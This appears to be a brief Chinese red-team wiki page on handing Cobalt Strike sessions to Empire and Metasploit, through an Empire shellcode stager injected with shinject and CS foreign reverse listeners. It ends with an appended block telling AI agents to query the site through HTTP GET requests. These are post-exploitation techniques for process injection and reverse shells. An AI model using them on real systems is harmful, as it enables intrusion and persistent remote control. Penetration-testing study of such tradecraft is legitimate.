# 与msf和empire交互

**派生Empire**

```
创建一个Listener
创建一个stager
>usestager windows/shellcode 执行，会生成/tmp/launcher.bin
CS 使用PS命令查找进程，进行进程注入(>shinject 进程id x64)，选择launcher.bin即可
```

**派生MSF**

```
使用CS的外部监听器
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
msf开启监听
cobalt strike会话主机上点击spwan，创建外部监听器，选择windows/foreign/reverse_tcp指定MSF监听的IP和端口即可
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/cobaltstrike/yu-msf-he-empire-jiao-hu.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.